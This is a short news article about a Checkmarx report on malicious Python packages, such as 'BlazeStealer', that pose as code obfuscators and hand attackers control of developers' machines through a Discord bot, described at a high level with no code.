In a recent report by cybersecurity firm Checkmarx, researchers have uncovered a new wave of malware targeting developers working with the widely-used Python language. Specifically designed to infect computers of developers seeking to obfuscate their code, these malicious packages masquerade as legitimate tools, often appearing in open-source code libraries.
According to Checkmarx, attackers have capitalized on the growing trend of developers using tools to obfuscate their code, making it unreadable to unauthorized individuals. This year, the researchers note a surge in attackers posting packages with deceptive names, introducing a sinister element into the mix. The report, released on Wednesday, highlights the latest package named “BlazeStealer,” discovered in October, which carries a “destructive payload.”
Once a developer executes the code, BlazeStealer activates, retrieving an additional malicious script from an external source. This script enables a bot on the Discord messaging service, providing attackers with complete control over the victim’s computer. Checkmarx emphasizes that developers seeking to obfuscate their Python code become attractive targets due to their likely involvement with valuable and sensitive information.
The malicious packages often adopt names resembling clean Python obfuscators, with the October discovery labeled as “pyobfgood.” Once fully operational on the victim’s machine, it opens the door to a range of malicious activities, including data exfiltration, keystroke logging, and direct spying.
Checkmarx points out that the Discord bot, once activated, can secretly capture a photo using the victim’s webcam. The captured image is then transmitted back to the Discord channel, leaving no evidence of its presence after deleting the downloaded files.
Against this backdrop, the Biden administration has been urging the industry to enhance efforts in securing open-source software, recognizing the growing significance of these platforms in the digital landscape.